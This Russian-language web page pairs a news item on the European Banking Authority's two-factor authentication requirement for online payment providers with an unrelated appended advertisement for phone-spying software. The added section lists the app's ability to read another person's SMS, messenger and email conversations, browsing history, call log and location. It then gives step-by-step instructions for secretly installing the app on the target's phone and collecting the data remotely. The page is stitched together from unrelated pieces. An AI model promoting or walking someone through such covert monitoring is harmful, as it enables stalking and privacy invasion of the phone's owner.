Двухфакторную аутентификацию введут провайдеры платёжных услуг

036European Banking Authority (EBA) разработала новые концепции безопасности, принятые для проведения платежей онлайн. Новые требования вступили в силу в январе, детальный отчёт по этому вопросу можно найти на сайте организации.

Изменения направлены на улучшение параметров безопасности, что потенциально затруднит действия хакеров. В заметке указывается, что двухфакторная аутентификация должна быть введена всеми поставщиками подобных услуг. У провайдеров есть некоторое время для реализации требований, носящих новый европейский стандарт безопасности.

Особенно сильно будут затронуты те компании, которые выступают в качестве посредников между провайдерами и сайтами, с которых пользователи смогут осуществлять платежи. Крупнейшими являются PayPal и SagePay, а также Heartland и WorldPay. Последние две специализируются на защите услуг по выполнению платежей. Туда входит разработка систем шифрования информации, проработка протоколов безопасной передачи данных, планирование систем аутентификации для пользователей.

EBA не занималась разработкой плана самостоятельно. Работы велись с октября 2014 года, тогда состоялось несколько конференций с крупнейшими банковскими структурами. Иные банки могли направлять свои заявки в режиме онлайн, в которых указывали предложения по усовершенствованию стандартов безопасности. Хакерская деятельность в ушедшем году показала, что текущие стандарты сильно устарели и успешно обходятся злоумышленниками. Осуществление онлайн-транзакций требует более тщательного подхода, но без создания дополнительных неудобств для пользователей.

Провайдеры же выступили с критикой такого предложения, предпочитая дожидаться свежую версию Директивы о платежных услугах ЕС (PSD2). Но одобрена она будет не ранее 2016-2017 года, а политика EBA нацелена на предоставление комплексной защиты клиентам платёжных систем уже сейчас. Выигрывать от этого будут обычные пользователи, которые получат максимально надёжный инструмент для проведения безопасных транзакций в Интернете.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.